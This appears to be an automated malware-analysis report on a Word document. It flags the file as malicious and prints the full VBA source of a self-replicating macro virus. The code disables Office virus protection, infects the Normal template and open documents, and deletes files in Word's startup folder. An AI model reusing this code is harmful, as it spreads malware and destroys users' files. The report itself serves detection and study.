Verdict: MALICIOUS
Risk Score: 188
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1546.001 Event Triggered Execution: Run at Startup
The sample is a malicious OLE document containing VBA macros. The macros are designed to disable Office macro security features and replicate themselves to other documents, as indicated by the 'OLE_VBA_MACRO_VIRUS_REPLICATION' heuristic and the script's attempt to disable virus protection and modify the VBA project. The ClamAV detection 'Doc.Trojan.Touchme-1' further supports its malicious nature. The script's intent is to spread itself and impair defenses.
Heuristics (4)
- VBA macros detected (medium, 2 related findings) OLE_VBA_MACROS: Document contains VBA macro code.
- VBA macro-virus self-replication / AV tampering (critical) OLE_VBA_MACRO_VIRUS_REPLICATION: VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: Options.VirusProtection = False
- Document_Open macro (low) OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script: Private Sub Document_Open()
- OLE document has large unaccounted-for region (high) OLE_SLACK_ANOMALY: OLE file is 43,520 bytes but its declared streams total only 16,490 bytes; 27,030 bytes (62%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3873 bytes | 86aa1a9b309b49872c064d36d7e0834c96aa98777e34c05e4163b88264a0d1f9 | ClamAV: Doc.Trojan.Touchme-1 | unlikely |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' This code written by Reza Pc 212
' Copyright (C) 1999 ReYoKh Team Labs
' University of Gunadarma
'
' for all virii maker 'n the stupid jerk
'
' Last Up-Date 3 November 1999 [19.00:00]
Private Sub Infected()
On Error Resume Next
ID = "'tHe FuCkIng aV if TOuCh mE"
Dim ADSave, NTSave, ADInfect, NTInfect As Boolean
Dim Listing, Active, Ultah, Name As String
Dim AD, NT As Object
Set AD = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
Set NT = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
If AD.Lines(99, 1) = ID Then ADInfect = True
If NT.Lines(99, 1) = ID Then NTInfect = True
ActiveDocument.Protect -1
ActiveDocument.Password = ""
Options.VirusProtection = False
Options.SavePropertiesPrompt = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
WordBasic.DisableAutoMacros True
Application.Caption = "Mikrosof Werd"
For Each Obj In ActiveDocument.VBProject.VBComponents
If Obj.Name <> "EcHa" And Obj.Name <> "ThisDocument" Then
Application.OrganizerDelete Source:=ActiveDocument.FullName, _
Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems
End If
Next Obj
For Each Obj In NormalTemplate.VBProject.VBComponents
If Obj.Name <> "EcHa" And Obj.Name <> "ThisDocument" Then
Application.OrganizerDelete Source:=NormalTemplate.FullName, _
Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems
End If
Next Obj
If NTInfect = False Then
NTSave = NormalTemplate.Saved
Listing = AD.Lines(1, AD.CountOfLines)
NT.DeleteLines 1, NT.CountOfLines
NT.AddFromString Listing
If NTSave = True Then NormalTemplate.Save
Application.OrganizerCopy Source:=ActiveDocument.FullName, _
Destination:=NormalTemplate, Name:="EcHa", Object:=wdOrganizerObjectProjectItems
End If
ADSave = ActiveDocument.Saved
Listing = NT.Lines(1, NT.CountOfLines)
AD.DeleteLines 1, AD.CountOfLines
AD.AddFromString Listing
If ADSave = True Then ActiveDocument.Save
Application.OrganizerCopy Source:=NormalTemplate.FullName, _
Destination:=ActiveDocument, Name:="EcHa", Object:=wdOrganizerObjectProjectItems
If Day(Date) = 1 Then Name = ID
If Day(Date) = 5 And Month(Date) = 3 Then Name = "REZA"
If Day(Date) = 8 And Month(Date) = 8 Then Name = "YOMBI"
If Day(Date) = 22 And Month(Date) = 12 Then Name = "NELIS"
If Name <> "" And Name <> ID Then
Ultah = "Oh ya... Selamat Ulang Tahun !!!" + Chr(13) + Name + _
", I hope you always Happy"
Active = Assistant.Visible
Assistant.Visible = True
With Assistant.NewBalloon
.Text = "EcHa mengucapkan terima kasih... " + Chr(13) + _
"Telah menggunakan macro saya" + Chr(13) + Chr(13) + Ultah
.Show
End With
Assistant.Visible = Active
End If
Kill Application.StartupPath + "\*.*"
Options.VirusProtection = True
WordBasic.DisableAutoMacros False
End Sub
Private Sub Document_Close()
Infected
End Sub
Private Sub Document_Open()
Infected
End Sub
Private Sub Document_Save()
Infected
End Sub
Private Sub Document_New()
Infected
End Sub
Private Sub Document_Exit()
Infected
End Sub
Private Sub Document_Exec()
Infected
End Sub
'tHe FuCkIng aV if TOuCh mE